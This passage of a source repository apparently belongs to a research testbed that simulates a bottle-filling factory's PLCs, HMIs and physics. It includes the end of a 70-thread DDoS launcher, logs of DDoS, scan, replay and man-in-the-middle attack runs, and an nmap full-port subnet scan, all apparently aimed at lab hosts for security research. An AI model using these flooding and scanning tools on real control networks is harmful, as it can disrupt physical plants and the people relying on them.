59 | self.report("sent {} messages before stopping; max latency is {}".format(self.__counter, DDosAgent.max))
60 |
61 |
62 | if __name__ == '__main__':
63 | name_prefix = ''
64 | if len(sys.argv) > 1:
65 | name_prefix = sys.argv[1]
66 |
67 | attackers_count = 70
68 | attacker_list = []
69 | for i in range(attackers_count):
70 | attacker_list.append(DDosAgent('DDoS1_Agent_' + name_prefix + str(i), i==0))
71 |
72 | for attacker in attacker_list:
73 | attacker.start()
74 |
75 | sleep(60)
76 |
77 | for attacker in attacker_list:
78 | attacker.stop()
79 |
80 |
81 |
82 |
--------------------------------------------------------------------------------
/bottlefactory/src/FactorySimulation.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | from ics_sim.Device import HIL
4 | from Configs import TAG, PHYSICS, Connection
5 |
6 |
7 | class FactorySimulation(HIL):
8 | def __init__(self):
9 | super().__init__('Factory', Connection.CONNECTION, 100)
10 | self.init()
11 |
12 | def _logic(self):
13 | elapsed_time = self._current_loop_time - self._last_loop_time
14 |
15 | # update tank water level
16 | tank_water_amount = self._get(TAG.TAG_TANK_LEVEL_VALUE) * PHYSICS.TANK_LEVEL_CAPACITY
17 | if self._get(TAG.TAG_TANK_INPUT_VALVE_STATUS):
18 | tank_water_amount += PHYSICS.TANK_INPUT_FLOW_RATE * elapsed_time
19 |
20 | if self._get(TAG.TAG_TANK_OUTPUT_VALVE_STATUS):
21 | tank_water_amount -= PHYSICS.TANK_OUTPUT_FLOW_RATE * elapsed_time
22 |
23 | tank_water_level = tank_water_amount / PHYSICS.TANK_LEVEL_CAPACITY
24 |
25 | if tank_water_level > PHYSICS.TANK_MAX_LEVEL:
26 | tank_water_level = PHYSICS.TANK_MAX_LEVEL
27 | self.report('tank water overflowed', logging.WARNING)
28 | elif tank_water_level <= 0:
29 | tank_water_level = 0
30 | self.report('tank water is empty', logging.WARNING)
31 |
32 | # update tank water flow
33 | tank_water_flow = 0
34 | if self._get(TAG.TAG_TANK_OUTPUT_VALVE_STATUS) and tank_water_amount > 0:
35 | tank_water_flow = PHYSICS.TANK_OUTPUT_FLOW_RATE
36 |
37 | # update bottle water
38 | if self._get(TAG.TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE) > 1:
39 | bottle_water_amount = 0
40 | if self._get(TAG.TAG_TANK_OUTPUT_FLOW_VALUE):
41 | self.report('water is wasting', logging.WARNING)
42 | else:
43 | bottle_water_amount = self._get(TAG.TAG_BOTTLE_LEVEL_VALUE) * PHYSICS.BOTTLE_LEVEL_CAPACITY
44 | bottle_water_amount += self._get(TAG.TAG_TANK_OUTPUT_FLOW_VALUE) * elapsed_time
45 |
46 | bottle_water_level = bottle_water_amount / PHYSICS.BOTTLE_LEVEL_CAPACITY
47 |
48 | if bottle_water_level > PHYSICS.BOTTLE_MAX_LEVEL:
49 | bottle_water_level = PHYSICS.BOTTLE_MAX_LEVEL
50 | self.report('bottle water overflowed', logging.WARNING)
51 |
52 | # update bottle position
53 | bottle_distance_to_filler = self._get(TAG.TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE)
54 | if self._get(TAG.TAG_CONVEYOR_BELT_ENGINE_STATUS):
55 | bottle_distance_to_filler -= elapsed_time * PHYSICS.CONVEYOR_BELT_SPEED
56 | bottle_distance_to_filler %= PHYSICS.BOTTLE_DISTANCE
57 |
58 | # update physical properties
59 | self._set(TAG.TAG_TANK_LEVEL_VALUE, tank_water_level)
60 | self._set(TAG.TAG_TANK_OUTPUT_FLOW_VALUE, tank_water_flow)
61 | self._set(TAG.TAG_BOTTLE_LEVEL_VALUE, bottle_water_level)
62 | self._set(TAG.TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE, bottle_distance_to_filler)
63 |
64 | def init(self):
65 | initial_list = []
66 | for tag in TAG.TAG_LIST:
67 | initial_list.append((tag, TAG.TAG_LIST[tag]['default']))
68 |
69 | self._connector.initialize(initial_list)
70 |
71 |
72 | @staticmethod
73 | def recreate_connection():
74 | return True
75 |
76 |
77 | if __name__ == '__main__':
78 | factory = FactorySimulation()
79 | factory.start()
80 |
--------------------------------------------------------------------------------
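The tank update in `FactorySimulation._logic` converts the current level to a water amount, integrates the input/output flow rates over the elapsed milliseconds, and clamps the result. That step can be restated as a pure function (a minimal sketch: the constants are copied from `Configs.PHYSICS`, while `update_tank_level` itself is a hypothetical restatement, not code from the source):

```python
# Constants copied from Configs.PHYSICS.
TANK_LEVEL_CAPACITY = 3         # liters per level unit
TANK_MAX_LEVEL = 10
TANK_INPUT_FLOW_RATE = 0.0002   # liters per millisecond
TANK_OUTPUT_FLOW_RATE = 0.0001  # liters per millisecond


def update_tank_level(level, elapsed_ms, input_open, output_open):
    """Integrate in/out flows over elapsed_ms and clamp the level to [0, max]."""
    amount = level * TANK_LEVEL_CAPACITY
    if input_open:
        amount += TANK_INPUT_FLOW_RATE * elapsed_ms
    if output_open:
        amount -= TANK_OUTPUT_FLOW_RATE * elapsed_ms
    return min(max(amount / TANK_LEVEL_CAPACITY, 0), TANK_MAX_LEVEL)
```

For example, starting from the default level of 5.8 with only the input valve open, 3 seconds of simulated time adds 0.6 L and raises the level to 6.0, matching the integration performed each loop in `_logic`.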
/bottlefactory/src/HMI1.py:
--------------------------------------------------------------------------------
1 | import logging
2 | from datetime import datetime
3 |
4 | from ics_sim.Device import HMI
5 | from Configs import TAG, Controllers
6 |
7 |
8 | class HMI1(HMI):
9 | def __init__(self):
10 | super().__init__('HMI1', TAG.TAG_LIST, Controllers.PLCs, 500)
11 |
12 | self._rows = {}
13 | self.title_length = 27
14 | self.msg1_length = 21
15 | self.msg2_length = 10
16 | self._border = '-' * (self.title_length + self.msg1_length + self.msg2_length + 4)
17 |
18 | self._border_top = \
19 | "┌" + "─" * self.title_length + "┬" + "─" * self.msg1_length + "┬" + "─" * self.msg2_length + "┐"
20 | self._border_mid = \
21 | "├" + "─" * self.title_length + "┼" + "─" * self.msg1_length + "┼" + "─" * self.msg2_length + "┤"
22 | self._border_bot = \
23 | "└" + "─" * self.title_length + "┴" + "─" * self.msg1_length + "┴" + "─" * self.msg2_length + "┘"
24 |
25 | self.cellVerticalLine = "│"
26 |
27 | for tag in self.tags:
28 | pos = tag.rfind('_')
29 | tag_name = tag[0:pos]
30 | if tag_name not in self._rows:
31 | self._rows[tag_name] = {'tag': tag_name.center(self.title_length, ' '), 'msg1': '', 'msg2': ''}
32 |
33 | self._latency = 0
34 |
35 | def _display(self):
36 |
37 | self.__show_table()
38 |
39 | def _operate(self):
40 | self.__update_messages()
41 |
42 | def __update_messages(self):
43 | self._latency = 0
44 |
45 | for row in self._rows:
46 | self._rows[row]['msg1'] = ''
47 | self._rows[row]['msg2'] = ''
48 |
49 | for tag in self.tags:
50 | pos = tag.rfind('_')
51 | row = tag[0:pos]
52 | attribute = tag[pos + 1:]
53 |
54 | if attribute == 'value' or attribute == 'status':
55 | self._rows[row]['msg2'] += self.__get_formatted_value(tag)
56 | elif attribute == 'max':
57 | self._rows[row]['msg1'] += self.__get_formatted_value(tag)
58 | self._rows[row]['msg1'] = self._make_text(self._rows[row]['msg1'].center(self.msg1_length, " "), self.COLOR_GREEN)
59 | else:
60 | self._rows[row]['msg1'] += self.__get_formatted_value(tag)
61 |
62 | for row in self._rows:
63 | if self._rows[row]['msg1'] == '':
64 | self._rows[row]['msg1'] = ''.center(self.msg1_length, ' ')
65 | if self._rows[row]['msg2'] == '':
66 |                 self._rows[row]['msg2'] = ''.center(self.msg2_length, ' ')
67 |
68 | def __get_formatted_value(self, tag):
69 | timestamp = datetime.now()
70 | pos = tag.rfind('_')
71 | tag_name = tag[0:pos]
72 | tag_attribute = tag[pos + 1:]
73 |
74 | try:
75 | value = self._receive(tag)
76 | except Exception as e:
77 |             self.report(str(e), logging.WARNING)
78 | value = 'NULL'
79 |
80 | if tag_attribute == 'mode':
81 | if value == 1:
82 | value = self._make_text('Off manually'.center(self.msg1_length, " "), self.COLOR_YELLOW)
83 | elif value == 2:
84 | value = self._make_text('On manually'.center(self.msg1_length, " "), self.COLOR_YELLOW)
85 | elif value == 3:
86 | value = self._make_text('Auto'.center(self.msg1_length, " "), self.COLOR_GREEN)
87 |             else:
88 |                 value = self._make_text(str(value).center(self.msg1_length, " "), self.COLOR_RED)
89 | 
90 |
91 | elif tag_attribute == 'status' or self.tags[tag]['id'] == 7:
92 | if value == 'NULL':
93 | value = self._make_text(value.center(self.msg2_length, " "), self.COLOR_RED)
94 | elif value:
95 | value = self._make_text('>>>'.center(self.msg2_length, " "), self.COLOR_BLUE)
96 | else:
97 | value = self._make_text('X'.center(self.msg2_length, " "), self.COLOR_RED)
98 |
99 | elif tag_attribute == 'min':
100 | value = 'Min:' + str(value) + ' '
101 |
102 | elif tag_attribute == 'max':
103 | value = 'Max:' + str(value)
104 |
105 | elif value == 'NULL':
106 | value = self._make_text(value.center(self.msg2_length, " "), self.COLOR_RED)
107 | else:
108 | value = self._make_text(str(value).center(self.msg2_length, " "), self.COLOR_CYAN)
109 |
110 |         # total elapsed time in microseconds (.microseconds alone wraps at one second)
111 |         elapsed = (datetime.now() - timestamp).total_seconds() * 1_000_000
112 |         if elapsed > self._latency:
113 |             self._latency = elapsed
114 | return value
115 |
116 | def __show_table(self):
117 | result = " (Latency {}ms)\n".format(self._latency / 1000)
118 |
119 | first = True
120 | for row in self._rows:
121 | if first:
122 | result += self._border_top + "\n"
123 | first = False
124 | else:
125 | result += self._border_mid + "\n"
126 |
127 | result += '│{}│{}│{}│\n'.format(self._rows[row]['tag'], self._rows[row]['msg1'], self._rows[row]['msg2'])
128 |
129 | result += self._border_bot + "\n"
130 |
131 | self.report(result)
132 |
133 |
134 | if __name__ == '__main__':
135 | hmi1 = HMI1()
136 | hmi1.start()
137 |
--------------------------------------------------------------------------------
/bottlefactory/src/HMI2.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import sys
4 |
5 | from ics_sim.Device import HMI
6 | from Configs import TAG, Controllers
7 |
8 |
9 | class HMI2(HMI):
10 | def __init__(self):
11 | super().__init__('HMI2', TAG.TAG_LIST, Controllers.PLCs)
12 |
13 | def _display(self):
14 | 
15 |
16 | menu = '\n'
17 |
18 | menu += self.__get_menu_line(1, 'empty level of tank')
19 | menu += self.__get_menu_line(2, 'full level of tank')
20 | menu += self.__get_menu_line(3, 'full level of bottle')
21 | menu += self.__get_menu_line(4, 'status of tank Input valve')
22 | menu += self.__get_menu_line(5, 'status of tank output valve')
23 | menu += self.__get_menu_line(6, 'status of conveyor belt engine')
24 | self.report(menu)
25 |
26 | def __get_menu_line(self, number, text):
27 | return '{} To change the {} press {} \n'.format(
28 | self._make_text(str(number)+')', self.COLOR_BLUE),
29 | self._make_text(text, self.COLOR_GREEN),
30 | self._make_text(str(number), self.COLOR_BLUE)
31 | )
32 |
33 | def _operate(self):
34 | try:
35 | choice = self.__get_choice()
36 | input1, input2 = choice
37 | if input1 == 1:
38 | self._send(TAG.TAG_TANK_LEVEL_MIN, input2)
39 |
40 | elif input1 == 2:
41 | self._send(TAG.TAG_TANK_LEVEL_MAX, input2)
42 |
43 | elif input1 == 3:
44 | self._send(TAG.TAG_BOTTLE_LEVEL_MAX, input2)
45 |
46 | elif input1 == 4:
47 | self._send(TAG.TAG_TANK_INPUT_VALVE_MODE, input2)
48 |
49 | elif input1 == 5:
50 | self._send(TAG.TAG_TANK_OUTPUT_VALVE_MODE, input2)
51 |
52 | elif input1 == 6:
53 | self._send(TAG.TAG_CONVEYOR_BELT_ENGINE_MODE, input2)
54 |
55 |         except ValueError as e:
56 |             self.report(str(e))
57 |         except Exception as e:
58 |             self.report('The input is invalid: ' + str(e))
59 |
60 |         input('press enter to continue ...')
61 |
62 | def __get_choice(self):
63 | input1 = int(input('your choice (1 to 6): '))
64 | if input1 < 1 or input1 > 6:
65 | raise ValueError('just integer values between 1 and 6 are acceptable')
66 |
67 | if input1 <= 3:
68 | input2 = float(input('Specify set point (positive real value): '))
69 | if input2 < 0:
70 | raise ValueError('Negative numbers are not acceptable.')
71 | else:
72 | sub_menu = '\n'
73 | sub_menu += "1) Send command for manually off\n"
74 | sub_menu += "2) Send command for manually on\n"
75 | sub_menu += "3) Send command for auto operation\n"
76 | self.report(sub_menu)
77 | input2 = int(input('Command (1 to 3): '))
78 | if input2 < 1 or input2 > 3:
79 | raise ValueError('Just 1, 2, and 3 are acceptable for command')
80 |
81 | return input1, input2
82 |
83 |
84 | if __name__ == '__main__':
85 | hmi2 = HMI2()
86 | hmi2.start()
--------------------------------------------------------------------------------
/bottlefactory/src/HMI3.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import sys
4 | import time
5 | import random
6 |
7 | from ics_sim.Device import HMI
8 | from Configs import TAG, Controllers
9 |
10 |
11 | class HMI3(HMI):
12 | def __init__(self):
13 | super().__init__('HMI3', TAG.TAG_LIST, Controllers.PLCs)
14 |
15 |
16 | def _before_start(self):
17 | HMI._before_start(self)
18 |
19 | while True:
20 |             response = input("Do you want to start auto manipulation of the factory settings? (y/yes to start) \n")
21 | response = response.lower()
22 | if response == 'y' or response == 'yes':
23 | self._set_clear_scr(False)
24 |                 self.random_values = [["TANK LEVEL MIN", 1, 4.5], ["TANK LEVEL MAX", 5.5, 9], ["BOTTLE LEVEL MAX", 1, 1.9]]
25 | break
26 | else:
27 | continue
28 |
29 | def _display(self):
30 | n = random.randint(5, 20)
31 | print("Sleep for {} seconds \n".format(n))
32 | time.sleep(n)
33 |
34 |
35 | def _operate(self):
36 | try:
37 | choice = self.__get_choice()
38 | input1, input2 = choice
39 | if input1 == 1:
40 | self._send(TAG.TAG_TANK_LEVEL_MIN, input2)
41 |
42 | elif input1 == 2:
43 | self._send(TAG.TAG_TANK_LEVEL_MAX, input2)
44 |
45 | elif input1 == 3:
46 |                 self._send(TAG.TAG_BOTTLE_LEVEL_MAX, input2)
47 | 
48 |             print('set {} to {} automatically'.format(self.random_values[input1 - 1][0], input2))
49 |         except ValueError as e:
50 |             self.report(str(e))
51 |         except Exception as e:
52 |             self.report('The input is invalid: ' + str(e))
53 | 
54 |
55 | def __get_choice(self):
56 | input1 = random.randint(1, len(self.random_values))
57 | print(self.random_values)
58 | print(input1)
59 |         input2 = random.uniform(self.random_values[input1 - 1][1], self.random_values[input1 - 1][2])
60 |         print(input2)
61 | return input1, input2
62 |
63 |
64 |
65 | if __name__ == '__main__':
66 |     hmi3 = HMI3()
67 | hmi3.start()
--------------------------------------------------------------------------------
/bottlefactory/src/PLC1.py:
--------------------------------------------------------------------------------
1 | from ics_sim.Device import PLC, SensorConnector, ActuatorConnector
2 | from Configs import TAG, Controllers, Connection
3 | import logging
4 |
5 |
6 | class PLC1(PLC):
7 | def __init__(self):
8 | sensor_connector = SensorConnector(Connection.CONNECTION)
9 | actuator_connector = ActuatorConnector(Connection.CONNECTION)
10 | super().__init__(1, sensor_connector, actuator_connector, TAG.TAG_LIST, Controllers.PLCs)
11 |
12 | def _logic(self):
13 | # update TAG.TAG_TANK_INPUT_VALVE_STATUS
14 |
15 | if not self._check_manual_input(TAG.TAG_TANK_INPUT_VALVE_MODE, TAG.TAG_TANK_INPUT_VALVE_STATUS):
16 | tank_level = self._get(TAG.TAG_TANK_LEVEL_VALUE)
17 | if tank_level > self._get(TAG.TAG_TANK_LEVEL_MAX):
18 | self._set(TAG.TAG_TANK_INPUT_VALVE_STATUS, 0)
19 | elif tank_level < self._get(TAG.TAG_TANK_LEVEL_MIN):
20 | self._set(TAG.TAG_TANK_INPUT_VALVE_STATUS, 1)
21 |
22 | # update TAG.TAG_TANK_OUTPUT_VALVE_STATUS
23 | if not self._check_manual_input(TAG.TAG_TANK_OUTPUT_VALVE_MODE, TAG.TAG_TANK_OUTPUT_VALVE_STATUS):
24 | bottle_level = self._get(TAG.TAG_BOTTLE_LEVEL_VALUE)
25 | belt_position = self._get(TAG.TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE)
26 | if bottle_level > self._get(TAG.TAG_BOTTLE_LEVEL_MAX) or belt_position > 1.0:
27 | self._set(TAG.TAG_TANK_OUTPUT_VALVE_STATUS, 0)
28 | else:
29 | self._set(TAG.TAG_TANK_OUTPUT_VALVE_STATUS, 1)
30 |
31 | def _post_logic_update(self):
32 | super()._post_logic_update()
33 | #self.report("{} {}".format( self.get_alive_time() / 1000, self.get_loop_latency() / 1000), logging.INFO)
34 |
35 |
36 | if __name__ == '__main__':
37 | plc1 = PLC1()
38 | plc1.set_record_variables(True)
39 | plc1.start()
40 |
--------------------------------------------------------------------------------
/bottlefactory/src/PLC2.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import time
3 |
4 | from ics_sim.Device import PLC, SensorConnector, ActuatorConnector
5 | from Configs import TAG, Connection, Controllers
6 |
7 |
8 | class PLC2(PLC):
9 | def __init__(self):
10 | sensor_connector = SensorConnector(Connection.CONNECTION)
11 | actuator_connector = ActuatorConnector(Connection.CONNECTION)
12 | super().__init__(2, sensor_connector, actuator_connector, TAG.TAG_LIST, Controllers.PLCs)
13 |
14 | def _logic(self):
15 | if not self._check_manual_input(TAG.TAG_CONVEYOR_BELT_ENGINE_MODE, TAG.TAG_CONVEYOR_BELT_ENGINE_STATUS):
16 | t1 = time.time()
17 | flow = self._get(TAG.TAG_TANK_OUTPUT_FLOW_VALUE)
18 |
19 | belt_position = self._get(TAG.TAG_BOTTLE_DISTANCE_TO_FILLER_VALUE)
20 | bottle_level = self._get(TAG.TAG_BOTTLE_LEVEL_VALUE)
21 |
22 | if (belt_position > 1) or (flow == 0 and bottle_level > self._get(TAG.TAG_BOTTLE_LEVEL_MAX)):
23 | self._set(TAG.TAG_CONVEYOR_BELT_ENGINE_STATUS, 1)
24 | else:
25 | self._set(TAG.TAG_CONVEYOR_BELT_ENGINE_STATUS, 0)
26 |
27 |
28 | if __name__ == '__main__':
29 | plc2 = PLC2()
30 | plc2.set_record_variables(True)
31 | plc2.start()
32 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/9.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #cd src
4 | sudo ls
5 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/attack-logs/attacker_machine_summary.csv:
--------------------------------------------------------------------------------
1 | attack,startStamp,endStamp,startTime,endTime,attackerMAC,attackerIP,description
2 | ddos,1663682079.730767,1663682383.768882,2022-09-20 15:54:39.730767,2022-09-20 15:59:43.768882,02:42:c0:a8:00:29,192.168.0.41,ddos
3 | ip-scan,1663682423.853559,1663682428.697727,2022-09-20 16:00:23.853559,2022-09-20 16:00:28.697727,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
4 | replay,1663682468.741003,1663682535.516444,2022-09-20 16:01:08.741003,2022-09-20 16:02:15.516444,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
5 | mitm,1663682575.556887,1663682612.314834,2022-09-20 16:02:55.556887,2022-09-20 16:03:32.314834,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
6 | port-scan,1663682652.357352,1663682664.961336,2022-09-20 16:04:12.357352,2022-09-20 16:04:24.961336,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
7 | mitm,1663682705.009439,1663682741.633819,2022-09-20 16:05:05.009439,2022-09-20 16:05:41.633819,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
8 | port-scan,1663682781.645353,1663682794.380077,2022-09-20 16:06:21.645353,2022-09-20 16:06:34.380077,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
9 | port-scan,1663682834.421368,1663682846.385509,2022-09-20 16:07:14.421368,2022-09-20 16:07:26.385509,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
10 | ip-scan,1663682886.428848,1663682890.042186,2022-09-20 16:08:06.428848,2022-09-20 16:08:10.042186,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
11 | port-scan,1663682930.082188,1663682944.284971,2022-09-20 16:08:50.082188,2022-09-20 16:09:04.284971,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
12 | ip-scan,1663682984.326633,1663682988.305043,2022-09-20 16:09:44.326633,2022-09-20 16:09:48.305043,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
13 | port-scan,1663683028.345857,1663683041.960416,2022-09-20 16:10:28.345857,2022-09-20 16:10:41.960416,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
14 | ip-scan,1663683082.003998,1663683085.786715,2022-09-20 16:11:22.003998,2022-09-20 16:11:25.786715,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
15 | ip-scan,1663683125.826981,1663683129.683181,2022-09-20 16:12:05.826981,2022-09-20 16:12:09.683181,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
16 | ip-scan,1663683169.709712,1663683173.615377,2022-09-20 16:12:49.709712,2022-09-20 16:12:53.615377,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
17 | ddos,1663683218.656172,1663683284.033203,2022-09-20 16:13:38.656172,2022-09-20 16:14:44.033203,02:42:c0:a8:00:29,192.168.0.41,ddos
18 | port-scan,1663683324.077348,1663683339.196166,2022-09-20 16:15:24.077348,2022-09-20 16:15:39.196166,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
19 | ip-scan,1663683379.237152,1663683383.175534,2022-09-20 16:16:19.237152,2022-09-20 16:16:23.175534,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
20 | mitm,1663683423.218022,1663683460.256863,2022-09-20 16:17:03.218022,2022-09-20 16:17:40.256863,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
21 | ip-scan,1663683500.29838,1663683505.133496,2022-09-20 16:18:20.298380,2022-09-20 16:18:25.133496,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
22 | ddos,1663683550.159403,1663683610.99125,2022-09-20 16:19:10.159403,2022-09-20 16:20:10.991250,02:42:c0:a8:00:29,192.168.0.41,ddos
23 | mitm,1663683651.033033,1663683686.902644,2022-09-20 16:20:51.033033,2022-09-20 16:21:26.902644,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
24 | mitm,1663683726.936851,1663683763.736726,2022-09-20 16:22:06.936851,2022-09-20 16:22:43.736726,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
25 | ddos,1663683808.781532,1663683871.195,2022-09-20 16:23:28.781532,2022-09-20 16:24:31.195000,02:42:c0:a8:00:29,192.168.0.41,ddos
26 | ip-scan,1663683911.237765,1663683914.913962,2022-09-20 16:25:11.237765,2022-09-20 16:25:14.913962,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
27 | mitm,1663683954.957202,1663683991.950824,2022-09-20 16:25:54.957202,2022-09-20 16:26:31.950824,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
28 | ddos,1663684036.980584,1663684095.695907,2022-09-20 16:27:16.980584,2022-09-20 16:28:15.695907,02:42:c0:a8:00:29,192.168.0.41,ddos
29 | ip-scan,1663684135.744012,1663684139.319657,2022-09-20 16:28:55.744012,2022-09-20 16:28:59.319657,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
30 | replay,1663684179.340916,1663684244.785401,2022-09-20 16:29:39.340916,2022-09-20 16:30:44.785401,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
31 | mitm,1663684284.825418,1663684321.36504,2022-09-20 16:31:24.825418,2022-09-20 16:32:01.365040,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
32 | port-scan,1663684361.409163,1663684373.852429,2022-09-20 16:32:41.409163,2022-09-20 16:32:53.852429,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
33 | port-scan,1663684413.870493,1663684429.636184,2022-09-20 16:33:33.870493,2022-09-20 16:33:49.636184,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
34 | mitm,1663684469.641617,1663684506.412982,2022-09-20 16:34:29.641617,2022-09-20 16:35:06.412982,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
35 | mitm,1663684546.45543,1663684583.261452,2022-09-20 16:35:46.455430,2022-09-20 16:36:23.261452,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
36 | ip-scan,1663684623.307187,1663684627.300265,2022-09-20 16:37:03.307187,2022-09-20 16:37:07.300265,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
37 | ip-scan,1663684667.309589,1663684670.895525,2022-09-20 16:37:47.309589,2022-09-20 16:37:50.895525,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
38 | mitm,1663684710.938869,1663684747.57525,2022-09-20 16:38:30.938869,2022-09-20 16:39:07.575250,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
39 | replay,1663684787.613847,1663684854.059885,2022-09-20 16:39:47.613847,2022-09-20 16:40:54.059885,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
40 | port-scan,1663684894.08896,1663684907.986178,2022-09-20 16:41:34.088960,2022-09-20 16:41:47.986178,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
41 | port-scan,1663684948.025416,1663684962.905167,2022-09-20 16:42:28.025416,2022-09-20 16:42:42.905167,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
42 | ip-scan,1663685002.926912,1663685006.666371,2022-09-20 16:43:22.926912,2022-09-20 16:43:26.666371,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
43 | ddos,1663685051.701754,1663685110.670506,2022-09-20 16:44:11.701754,2022-09-20 16:45:10.670506,02:42:c0:a8:00:29,192.168.0.41,ddos
44 | ip-scan,1663685150.678591,1663685154.483437,2022-09-20 16:45:50.678591,2022-09-20 16:45:54.483437,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
45 | ip-scan,1663685194.525956,1663685198.4616,2022-09-20 16:46:34.525956,2022-09-20 16:46:38.461600,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
46 | ip-scan,1663685238.501989,1663685242.345949,2022-09-20 16:47:18.501989,2022-09-20 16:47:22.345949,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
47 | ip-scan,1663685282.387516,1663685286.541805,2022-09-20 16:48:02.387516,2022-09-20 16:48:06.541805,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
48 | replay,1663685326.583491,1663685393.346662,2022-09-20 16:48:46.583491,2022-09-20 16:49:53.346662,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
49 | replay,1663685433.388974,1663685499.908914,2022-09-20 16:50:33.388974,2022-09-20 16:51:39.908914,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
50 | port-scan,1663685539.949868,1663685556.114163,2022-09-20 16:52:19.949868,2022-09-20 16:52:36.114163,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
51 | mitm,1663685596.139047,1663685632.871519,2022-09-20 16:53:16.139047,2022-09-20 16:53:52.871519,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
52 | mitm,1663685672.894973,1663685709.881017,2022-09-20 16:54:32.894973,2022-09-20 16:55:09.881017,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
53 | ip-scan,1663685749.924495,1663685753.744528,2022-09-20 16:55:49.924495,2022-09-20 16:55:53.744528,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
54 | replay,1663685793.787033,1663685860.725437,2022-09-20 16:56:33.787033,2022-09-20 16:57:40.725437,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
55 | ip-scan,1663685900.769565,1663685904.71847,2022-09-20 16:58:20.769565,2022-09-20 16:58:24.718470,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
56 | port-scan,1663685944.760521,1663685960.757937,2022-09-20 16:59:04.760521,2022-09-20 16:59:20.757937,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
57 | ip-scan,1663686000.787798,1663686004.470038,2022-09-20 17:00:00.787798,2022-09-20 17:00:04.470038,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
58 | ddos,1663686049.517334,1663686108.149237,2022-09-20 17:00:49.517334,2022-09-20 17:01:48.149237,02:42:c0:a8:00:29,192.168.0.41,ddos
59 | ip-scan,1663686148.178409,1663686152.175079,2022-09-20 17:02:28.178409,2022-09-20 17:02:32.175079,02:42:c0:a8:00:29,192.168.0.41,scan-scapy
60 | port-scan,1663686192.21746,1663686206.772917,2022-09-20 17:03:12.217460,2022-09-20 17:03:26.772917,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
61 | replay,1663686246.816962,1663686313.451679,2022-09-20 17:04:06.816962,2022-09-20 17:05:13.451679,02:42:c0:a8:00:29,192.168.0.41,replay-scapy
62 | mitm,1663686353.476888,1663686390.088303,2022-09-20 17:05:53.476888,2022-09-20 17:06:30.088303,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
63 | port-scan,1663686430.125576,1663686444.983339,2022-09-20 17:07:10.125576,2022-09-20 17:07:24.983339,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
64 | mitm,1663686485.028528,1663686521.226361,2022-09-20 17:08:05.028528,2022-09-20 17:08:41.226361,02:42:c0:a8:00:29,192.168.0.41,mitm-scapy
65 | port-scan,1663686561.263111,1663686575.295529,2022-09-20 17:09:21.263111,2022-09-20 17:09:35.295529,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
66 | port-scan,1663686615.309533,1663686629.580709,2022-09-20 17:10:15.309533,2022-09-20 17:10:29.580709,02:42:c0:a8:00:29,192.168.0.41,scan-nmap
67 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/attack-logs/attacker_summary.csv:
--------------------------------------------------------------------------------
1 | attack,startStamp,endStamp,startTime,endTime,attackerMAC,attackerIP,description
2 |
--------------------------------------------------------------------------------
/bottlefactory/src/attacks/attack-logs/log-scan-nmap.txt:
--------------------------------------------------------------------------------
1 | # Nmap 7.92 scan initiated Tue Sep 20 17:10:15 2022 as: nmap -p- -oN ./attacks/attack-logs/log-scan-nmap.txt 192.168.0.1-255
